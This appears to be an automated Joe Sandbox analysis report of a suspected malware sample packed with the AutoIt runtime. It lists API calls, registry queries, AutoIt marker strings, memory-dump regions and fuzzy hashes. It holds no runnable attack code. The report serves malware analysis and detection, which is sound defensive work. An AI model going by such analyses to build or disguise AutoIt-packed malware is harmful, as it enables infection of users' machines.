• GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EBED
Strings
Memory Dump Source
• Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID: IsThemeActive$uxtheme.dll
• API String ID: 2574300362-3542929980
• Opcode ID: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
• Instruction ID: d0aec1e7cdd3fc231052cfb2f432bc7d0e698e699ac1f50efe2d89ca8b78c0bc
• Opcode Fuzzy Hash: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
• Instruction Fuzzy Hash: D6D0C7B49407039AD7305F71C91871B76E47B50751F104C3DF946A1294DB7CD040D768
APIs
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409266
• Sleep.KERNEL32(0000000A,?), ref: 004094D1
• TranslateMessage.USER32(?), ref: 00409556
• DispatchMessageW.USER32(?), ref: 00409561
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
Strings
Memory Dump Source
• Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
Similarity
• API ID: Message$Peek$DispatchSleepTranslate
• String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE
• API String ID: 1762048999-758534266
• Opcode ID: f501adada9997479f36eff97a8dbeac7b9e74cdaa6692d9ba2f3cae751283df7
• Instruction ID: 6221a9036d09df45d33125ba93b856da71e554157a22c4cdc10a0b2ba1356448
• Opcode Fuzzy Hash: f501adada9997479f36eff97a8dbeac7b9e74cdaa6692d9ba2f3cae751283df7
• Instruction Fuzzy Hash: EF62E370608341AFD724DF25C884BABF7A4BF85304F14492FF94597292D778AC89CB9A

Control-flow Graph
APIs
• GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104,?), ref: 00401F4C
  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
• __wcsicoll.LIBCMT ref: 00402007
• __wcsicoll.LIBCMT ref: 0040201D
• __wcsicoll.LIBCMT ref: 00402033
  • Part of subcall function 004114AB: __wcsicmp_l.LIBCMT ref: 0041152B
• __wcsicoll.LIBCMT ref: 00402049
• _wcscpy.LIBCMT ref: 0040207C
• GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104), ref: 00428B5B
Strings
Memory Dump Source
• Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
Similarity
• API ID: __wcsicoll$FileModuleName$__wcsicmp_l_memmove_wcscpy_wcslen
• String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$CMDLINE$CMDLINERAW
• API String ID: 3948761352-1609664196
• Opcode ID: 27c0ee8d5e07ffa73b3ecf85f0a0f7e742300051f6853106ad547b3ced8c3f3f
• Instruction ID: a67d1fff980de619c7b08a01c822048bbc87f212fdb5160913ca6de555091b2a
• Opcode Fuzzy Hash: 27c0ee8d5e07ffa73b3ecf85f0a0f7e742300051f6853106ad547b3ced8c3f3f
• Instruction Fuzzy Hash: 0E718571D0021A9ACB10EBA1DD456EE7774AF54308F40843FF905772D1EBBC6A49CB99

Control-flow Graph
APIs
  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
• GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040E3FF
• __wsplitpath.LIBCMT ref: 0040E41C
  • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
• _wcsncat.LIBCMT ref: 0040E433
• __wmakepath.LIBCMT ref: 0040E44F
  • Part of subcall function 00413A9E: __wmakepath_s.LIBCMT ref: 00413AB4
  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
  • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
• _wcscpy.LIBCMT ref: 0040E487
  • Part of subcall function 0040E4C0: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
• _wcscat.LIBCMT ref: 00427541
• _wcslen.LIBCMT ref: 00427551
• _wcslen.LIBCMT ref: 00427562
• _wcscat.LIBCMT ref: 0042757C
• _wcsncpy.LIBCMT ref: 004275BC
Strings
Memory Dump Source
• Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
Similarity
• API ID: _wcscat_wcslenstd::exception::exception$Exception@8FileModuleNameOpenThrow__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpy
• String ID: Include$\
• API String ID: 3173733714-3429789819
• Opcode ID: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
• Instruction ID: e70d120923bcd55e0c09bdb97153e7c20ea4c8242d515b2096525f9594b4aeca
• Opcode Fuzzy Hash: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
• Instruction Fuzzy Hash: 9851DAB1504301ABE314EF66DC8589BBBE4FB8D304F40493EF589972A1E7749944CB5E

Control-flow Graph
APIs
• _fseek.LIBCMT ref: 0045292B
  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
  • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
  • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
• __fread_nolock.LIBCMT ref: 00452961
• __fread_nolock.LIBCMT ref: 00452971
• __fread_nolock.LIBCMT ref: 0045298A
• __fread_nolock.LIBCMT ref: 004529A5
• _fseek.LIBCMT ref: 004529BF
• _malloc.LIBCMT ref: 004529CA
• _malloc.LIBCMT ref: 004529D6
• __fread_nolock.LIBCMT ref: 004529E7
• _free.LIBCMT ref: 00452A17
• _free.LIBCMT ref: 00452A20
Memory Dump Source
• Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
Similarity
• API ID: __fread_nolock$_free_fseek_malloc_wcscpy
• String ID:
• API String ID: 1255752989-0
• Opcode ID: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
• Instruction ID: f7ea06a446360153d9086f7ce944ba4ee1a7a4a6ab52c1fb03413739877f8e55
• Opcode Fuzzy Hash: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
• Instruction Fuzzy Hash: B95111F1900218AFDB60DF65DC81B9A77B9EF88304F0085AEF50CD7241E675AA84CF59

Control-flow Graph
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
Similarity
• API ID: __fread_nolock$_fseek_wcscpy
• String ID: FILE
• API String ID: 3888824918-3121273764
• Opcode ID: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
• Instruction ID: d9efd4ed024b2b159ad8c10c4a9bf0fd337e36d0f3dc2ca46923192c63d65648
• Opcode Fuzzy Hash: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
• Instruction Fuzzy Hash: DC4196B2910204BBEB20EBD5DC81FEF7379AF88704F14455EFA0497281F6799684CBA5

Control-flow Graph
APIs
• GetSysColorBrush.USER32(0000000F), ref: 004104C3
• RegisterClassExW.USER32(00000030), ref: 004104ED
• RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
• InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
• ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
• LoadIconW.USER32(00400000,000000A9), ref: 00410542
• ImageList_ReplaceIcon.COMCTL32(00930360,000000FF,00000000), ref: 00410552
Strings
Memory Dump Source
• Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
Similarity
• API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
• String ID: +$0$AutoIt v3 GUI$TaskbarCreated
• API String ID: 2914291525-1005189915
• Opcode ID: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
• Instruction ID: 324008788ca11066222c16167fc5b3db855b21205033cf9bff29629ff6c43806
• Opcode Fuzzy Hash: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
• Instruction Fuzzy Hash: 6221F7B1900218AFDB40DFA4E988B9DBFB4FB09710F10862EFA15A6390D7B40544CF99

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                                                                                                    • LoadIconW.USER32(?,00000063), ref: 004103C0
                                                                                                                    • LoadIconW.USER32(?,000000A4), ref: 004103D3
                                                                                                                    • LoadIconW.USER32(?,000000A2), ref: 004103E6
                                                                                                                    • LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                                                                                                    • RegisterClassExW.USER32(?), ref: 0041045D
                                                                                                                      • Part of subcall function 00410490: GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                                                                                                      • Part of subcall function 00410490: RegisterClassExW.USER32(00000030), ref: 004104ED
                                                                                                                      • Part of subcall function 00410490: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                                                                                                      • Part of subcall function 00410490: InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                                                                                                      • Part of subcall function 00410490: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                                                                                                      • Part of subcall function 00410490: LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                                                                                                      • Part of subcall function 00410490: ImageList_ReplaceIcon.COMCTL32(00930360,000000FF,00000000), ref: 00410552
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                    • String ID: #$0$AutoIt v3
                                                                                                                    • API String ID: 423443420-4155596026
                                                                                                                    • Opcode ID: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                                                                                                    • Instruction ID: fa3beea58d24b169a793a749875a715f65b9999dd8e8f54869ce90ead7ff89b0
                                                                                                                    • Opcode Fuzzy Hash: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                                                                                                    • Instruction Fuzzy Hash: 31212AB1E55214AFD720DFA9ED45B9EBBB8BB4C700F00447AFA08A7290D7B559408B98
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _malloc
                                                                                                                    • String ID: Default
                                                                                                                    • API String ID: 1579825452-753088835
                                                                                                                    • Opcode ID: 4baf5ca2405be5455ac24bb95f1fa40f153dd1d14dcfbbf3cadbb4c6cd5c85f8
                                                                                                                    • Instruction ID: a673259d86369fb9501a746496732cc59a2062e12c9a0651055f0cdb6904a52b
                                                                                                                    • Opcode Fuzzy Hash: 4baf5ca2405be5455ac24bb95f1fa40f153dd1d14dcfbbf3cadbb4c6cd5c85f8
                                                                                                                    • Instruction Fuzzy Hash: 13729DB06043019FD714DF25D481A2BB7E5EF85314F14882EE986AB391D738EC56CB9B

                                                                                                                    Control-flow Graph
                                                                                                                    • Function entry: 0040F5C0 (graph rendering with executed / not-executed block marking not reproduced in text)
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __fread_nolock_fseek_memmove_strcat
                                                                                                                    • String ID: AU3!$EA06
                                                                                                                    • API String ID: 1268643489-2658333250
                                                                                                                    • Opcode ID: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                                                                                                                    • Instruction ID: 581a58983a44a30c9dde9fea67fd4d6d070b0eb534c71953d0d39c84ae2506d9
                                                                                                                    • Opcode Fuzzy Hash: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                                                                                                                    • Instruction Fuzzy Hash: A541EF3160414CABCB21DF64D891FFD3B749B15304F2808BFF581A7692EA79A58AC754

                                                                                                                    Control-flow Graph
                                                                                                                    • Function entry: 00401100 (graph rendering with executed / not-executed block marking not reproduced in text)
                                                                                                                    APIs
                                                                                                                    • DefWindowProcW.USER32(?,?,?,?,?,?,?,004010F8,?,?,?), ref: 00401136
                                                                                                                    • KillTimer.USER32(?,00000001,?), ref: 004011B9
                                                                                                                    • PostQuitMessage.USER32(00000000), ref: 004011CB
                                                                                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 004011E5
                                                                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,004010F8,?,?,?), ref: 004011F0
                                                                                                                    • CreatePopupMenu.USER32 ref: 00401204
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                    • String ID: TaskbarCreated
                                                                                                                    • API String ID: 129472671-2362178303
                                                                                                                    • Opcode ID: cce8c5a03ea04b09f31441a39b36d20ef7a6309a2ce36e618d98c5e601e7cd17
                                                                                                                    • Instruction ID: c871ea33cf18a3cc9178abcaf30b48d6b70312a550ef0fd47f6a389c1f0ea6f4
                                                                                                                    • Opcode Fuzzy Hash: cce8c5a03ea04b09f31441a39b36d20ef7a6309a2ce36e618d98c5e601e7cd17
                                                                                                                    • Instruction Fuzzy Hash: 1E417932B0420497DB28DB68EC85BBE3355E759320F10493FFA11AB6F1C67D9850879E

                                                                                                                    Control-flow Graph
                                                                                                                    • Function entry: 004115D7 (graph rendering with executed / not-executed block marking not reproduced in text)
                                                                                                                    APIs
                                                                                                                    • _malloc.LIBCMT ref: 004115F1
                                                                                                                      • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                                                                                      • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                                                                                      • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                                                                                    • std::exception::exception.LIBCMT ref: 00411626
                                                                                                                    • std::exception::exception.LIBCMT ref: 00411640
                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                                                                                    • String ID: ,*H$4*H$@fI
                                                                                                                    • API String ID: 615853336-1459471987
                                                                                                                    • Opcode ID: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                                                                                                    • Instruction ID: 1677ae912bb9c86ef767233b76c14da205579da8f33ef274bedc9cd0e4e1b94c
                                                                                                                    • Opcode Fuzzy Hash: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                                                                                                    • Instruction Fuzzy Hash: C5F0F9716001196BCB24AB56DC01AEE7AA5AB40708F15002FF904951A1CBB98AC2875D

                                                                                                                    Control-flow Graph
                                                                                                                    • Function entry: 04209628 (graph rendering with executed / not-executed block marking not reproduced in text)
                                                                                                                    APIs
                                                                                                                    • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 042096F9
                                                                                                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0420991F
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2145500065.0000000004207000.00000040.00000020.00020000.00000000.sdmp, Offset: 04207000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_4207000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateFileFreeVirtual
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 204039940-0
                                                                                                                    • Opcode ID: e3e00bf9dbafeb2e33b0b1731302cb2fbf5584eb46f22b1b855d3d8c7a9348fe
                                                                                                                    • Instruction ID: 783d45988b7ec7368c0295fa18eaa3ad9cd7fb6cb0dc9744046d9b97d1066a76
                                                                                                                    • Opcode Fuzzy Hash: e3e00bf9dbafeb2e33b0b1731302cb2fbf5584eb46f22b1b855d3d8c7a9348fe
                                                                                                                    • Instruction Fuzzy Hash: A1A11BB4E10209EBDB24CFA4C894BEEB7B5BF48304F108159E516BB2C2D775AA85CF50

                                                                                                                    Control-flow Graph
                                                                                                                    • Function entry: 0040E4C0 (graph rendering with executed / not-executed block marking not reproduced in text)
                                                                                                                    APIs
                                                                                                                    • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                                                                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,0040E4A1,00000000,?,?,?,0040E4A1), ref: 004271A6
                                                                                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,0040E4A1,?,00000000,?,?,?,?,0040E4A1), ref: 004271ED
                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,0040E4A1), ref: 0042721E
Memory Dump Source
• Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
Similarity
• API ID: QueryValue$CloseOpen
• String ID: Include$Software\AutoIt v3\AutoIt
• API String ID: 1586453840-614718249
• Opcode ID: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
